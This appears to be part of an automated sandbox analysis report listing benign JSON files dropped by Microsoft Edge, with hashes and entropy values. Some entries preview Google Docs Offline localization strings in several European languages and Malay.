                                                                                                                                                                            SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1895
                                                                                                                                                                            Entropy (8bit):4.28990403715536
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                            MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                            SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                            SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                            SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1042
                                                                                                                                                                            Entropy (8bit):5.3945675025513955
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                            MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                            SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                            SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                            SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2535
                                                                                                                                                                            Entropy (8bit):3.8479764584971368
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                            MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                            SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                            SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                            SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1028
                                                                                                                                                                            Entropy (8bit):4.797571191712988
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                            MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                            SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                            SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                            SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):994
                                                                                                                                                                            Entropy (8bit):4.700308832360794
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                            MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                            SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                            SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                            SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2091
                                                                                                                                                                            Entropy (8bit):4.358252286391144
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                            MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                            SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                            SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                            SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2778
                                                                                                                                                                            Entropy (8bit):3.595196082412897
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                            MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                            SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                            SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                            SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1719
                                                                                                                                                                            Entropy (8bit):4.287702203591075
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                            MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                            SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                            SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                            SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):936
                                                                                                                                                                            Entropy (8bit):4.457879437756106
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                            MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                            SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                            SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                            SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3830
                                                                                                                                                                            Entropy (8bit):3.5483353063347587
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                            MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                            SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                            SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                            SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1898
                                                                                                                                                                            Entropy (8bit):4.187050294267571
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                            MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                            SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                            SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                            SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):914
                                                                                                                                                                            Entropy (8bit):4.513485418448461
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                            MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                            SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                            SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                            SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):878
                                                                                                                                                                            Entropy (8bit):4.4541485835627475
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                            MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                            SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                            SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                            SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2766
                                                                                                                                                                            Entropy (8bit):3.839730779948262
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                            MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                            SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                            SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                            SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):978
                                                                                                                                                                            Entropy (8bit):4.879137540019932
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                            MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                            SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                            SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                            SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):907
                                                                                                                                                                            Entropy (8bit):4.599411354657937
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                            MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                            SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                            SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                            SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):914
                                                                                                                                                                            Entropy (8bit):4.604761241355716
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                            MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                            SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                            SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                            SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):937
                                                                                                                                                                            Entropy (8bit):4.686555713975264
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                            MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                            SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                            SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                            SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1337
                                                                                                                                                                            Entropy (8bit):4.69531415794894
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                            MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                            SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                            SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                            SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2846
                                                                                                                                                                            Entropy (8bit):3.7416822879702547
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                            MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                            SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                            SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                            SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):934
                                                                                                                                                                            Entropy (8bit):4.882122893545996
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                            MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                            SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                            SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                            SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
